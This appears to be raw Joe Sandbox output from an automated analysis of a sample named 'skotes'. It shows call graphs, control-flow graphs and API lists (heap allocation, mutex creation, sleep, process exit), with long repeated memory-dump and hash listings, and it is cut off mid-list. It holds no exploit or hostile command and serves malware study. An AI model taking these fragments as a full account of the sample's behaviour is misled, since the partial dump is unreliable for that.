4 API calls 12592->12594 12594->12586 12594->12588 12594->12591 12594->12592 11681 bd2170 11686 bec6fc 11681->11686 11684 bed64e RtlAllocateHeap 11685 bd2184 11684->11685 11687 bec70c 11686->11687 11688 bd217a 11686->11688 11687->11688 11690 becfbe 11687->11690 11688->11684 11691 beccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 11690->11691 11692 becfd0 11691->11692 11692->11687 11693 bd3970 11694 bec68b __Mtx_init_in_situ 2 API calls 11693->11694 11695 bd39a7 11694->11695 11696 bec68b __Mtx_init_in_situ 2 API calls 11695->11696 11697 bd39e6 11696->11697 12595 bd3770 12596 bd379b 12595->12596 12597 bd37cd shared_ptr 12596->12597 12598 c06c6a RtlAllocateHeap 12596->12598 12599 bd380f 12598->12599 11718 bd215a 11719 bec6fc InitializeCriticalSectionEx 11718->11719 11720 bd2164 11719->11720 11721 bed64e RtlAllocateHeap 11720->11721 11722 bd216e 11721->11722 12623 c06729 12626 c06672 12623->12626 12625 c0673b 12628 c0667e __dosmaperr 12626->12628 12627 c06685 12629 c075f6 __dosmaperr RtlAllocateHeap 12627->12629 12628->12627 12630 c066a5 12628->12630 12631 c0668a 12629->12631 12632 c066b7 12630->12632 12633 c066aa 12630->12633 12634 c06c5a __cftof RtlAllocateHeap 12631->12634 12640 c0a8c3 12632->12640 12635 c075f6 __dosmaperr RtlAllocateHeap 12633->12635 12639 c06695 12634->12639 12635->12639 12637 c066c0 12638 c075f6 __dosmaperr RtlAllocateHeap 12637->12638 12637->12639 12638->12639 12639->12625 12641 c0a8cf __dosmaperr 12640->12641 12644 c0a967 12641->12644 12643 c0a8ea 12643->12637 12647 c0a98a 12644->12647 12645 c0a9d0 12645->12643 12646 c0d82f __dosmaperr RtlAllocateHeap 12648 c0a9eb 12646->12648 12647->12645 12647->12646 12649 c0adf5 ___free_lconv_mon RtlAllocateHeap 12648->12649 12649->12645 11723 bda54d 11724 bda555 shared_ptr 11723->11724 11725 bda628 shared_ptr 11724->11725 11726 bda944 11724->11726 11731 be80c0 RtlAllocateHeap 11725->11731 11727 c06c6a RtlAllocateHeap 11726->11727 11728 bda949 11727->11728 11729 bda94e 11728->11729 11730 c06c6a RtlAllocateHeap 11728->11730 11733 bda953 Sleep CreateMutexA 11729->11733 11734 c06c6a RtlAllocateHeap 11729->11734 11730->11729 11732 bda903 11731->11732 11735 bda98e 11733->11735 11734->11733 12659 bd9f44 12662 bd9f4c shared_ptr 12659->12662 12660 bda01f shared_ptr 12665 be80c0 RtlAllocateHeap 12660->12665 12661 bda92b 12663 bda953 Sleep CreateMutexA 12661->12663 12664 c06c6a RtlAllocateHeap 12661->12664 12662->12660 12662->12661 12666 bda98e 12663->12666 12664->12663 12667 bda903 12665->12667

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 367 c0652b-c06538 call c0a302 370 c0655a-c0656c call c0656d ExitProcess 367->370 371 c0653a-c06548 GetPEB 367->371 371->370 372 c0654a-c06559 371->372 372->370
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00C0652A,?,?,?,?,?,00C07661), ref: 00C06567
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                                              • Opcode ID: 2b2e8786d4c7a5520306a5c2774555035b31eb30c35b845eacccb46fe679ddba
                                                                                                                                                                                                                                              • Instruction ID: 626a28bd6edd4dbc981bcea72abad71b3fd39de9518f379f4d845935b5bb5321
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b2e8786d4c7a5520306a5c2774555035b31eb30c35b845eacccb46fe679ddba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDE0C231000648AFCF257F59CC2AE893B29EF81785F000910FD28466A2CB35EEA1DA80

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: cffea11f7078baf91162cee9dc464a096629e8852a40a9c57ba39390b3236057
                                                                                                                                                                                                                                              • Instruction ID: 7f8a0ec6b1c943d736a68280e4ac1196180a595cec942a4a240ed072ae6102b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cffea11f7078baf91162cee9dc464a096629e8852a40a9c57ba39390b3236057
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0319B317101048BFB08DB78DDC976DFBE2DBC5314F24429AE014977E6E77A99808751

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 22 bd9f44-bd9f64 26 bd9f66-bd9f72 22->26 27 bd9f92-bd9fae 22->27 28 bd9f88-bd9f8f call bed663 26->28 29 bd9f74-bd9f82 26->29 30 bd9fdc-bd9ffb 27->30 31 bd9fb0-bd9fbc 27->31 28->27 29->28 34 bda92b 29->34 32 bd9ffd-bda009 30->32 33 bda029-bda916 call be80c0 30->33 36 bd9fbe-bd9fcc 31->36 37 bd9fd2-bd9fd9 call bed663 31->37 38 bda01f-bda026 call bed663 32->38 39 bda00b-bda019 32->39 41 bda953-bda994 Sleep CreateMutexA 34->41 42 bda92b call c06c6a 34->42 36->34 36->37 37->30 38->33 39->34 39->38 52 bda9a7-bda9a8 41->52 53 bda996-bda998 41->53 42->41 53->52 54 bda99a-bda9a5 53->54 54->52
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190083042.0000000000C3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190109598.0000000000C45000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190134944.0000000000C46000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190164290.0000000000C47000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190332002.0000000000DA1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190359366.0000000000DA3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190390502.0000000000DBA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190412116.0000000000DBC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190436081.0000000000DC8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190474182.0000000000DCD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190489139.0000000000DCF000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190504469.0000000000DDB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190519203.0000000000DE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190539543.0000000000DF4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190562376.0000000000DF5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190577521.0000000000DF6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190597488.0000000000E09000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190617201.0000000000E21000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190632773.0000000000E22000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190649011.0000000000E2A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190665401.0000000000E2B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190686546.0000000000E34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190703277.0000000000E3B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190717961.0000000000E3C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190732767.0000000000E3E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190750881.0000000000E4C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190767382.0000000000E4E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190782460.0000000000E4F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190801321.0000000000E56000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190819556.0000000000E5D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190836027.0000000000E5F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190851456.0000000000E67000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190866029.0000000000E69000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190883869.0000000000E78000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000E79000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190899959.0000000000EA9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190949058.0000000000EC3000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190965422.0000000000EC4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190983250.0000000000EDA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190998963.0000000000EDB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191013778.0000000000EDC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191029584.0000000000EE0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191050457.0000000000EE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191068741.0000000000EF0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2191085824.0000000000EF1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_bd0000_skotes.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1464230837-0
                                                                                                                                                                                                                                              • Opcode ID: 38784066a1f79b4d22feb0bcdfee724853727794605abead8c8ed15b9d4f1417
                                                                                                                                                                                                                                              • Instruction ID: ebdc4f30bc676c63b83dcad4349f726a1452826500d56d14a687fa0585b0442a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38784066a1f79b4d22feb0bcdfee724853727794605abead8c8ed15b9d4f1417
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E83168716001448BFB08DB78DCD87ADF7E2EBC5314F20469AE014D77E1E77AA9808752

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 56 bda079-bda099 60 bda09b-bda0a7 56->60 61 bda0c7-bda0e3 56->61 62 bda0bd-bda0c4 call bed663 60->62 63 bda0a9-bda0b7 60->63 64 bda0e5-bda0f1 61->64 65 bda111-bda130 61->65 62->61 63->62 68 bda930-bda994 call c06c6a Sleep CreateMutexA 63->68 70 bda107-bda10e call bed663 64->70 71 bda0f3-bda101 64->71 66 bda15e-bda916 call be80c0 65->66 67 bda132-bda13e 65->67 72 bda154-bda15b call bed663 67->72 73 bda140-bda14e 67->73 86 bda9a7-bda9a8 68->86 87 bda996-bda998 68->87 70->65 71->68 71->70 72->66 73->68 73->72 87->86 88 bda99a-bda9a5 87->88 88->86
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • Sleep.KERNELBASE(00000064), ref: 00BDA963
                                                                                                                                                                                                                                              • CreateMutexA.KERNELBASE(00000000,00000000,00C33254), ref: 00BDA981
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.2189953955.0000000000BD1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189931163.0000000000BD0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2189953955.0000000000C32000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000003.00000002.2190053283.0000000000C39000.00000008.00000001.01000000.00000008.sdmpDownload File
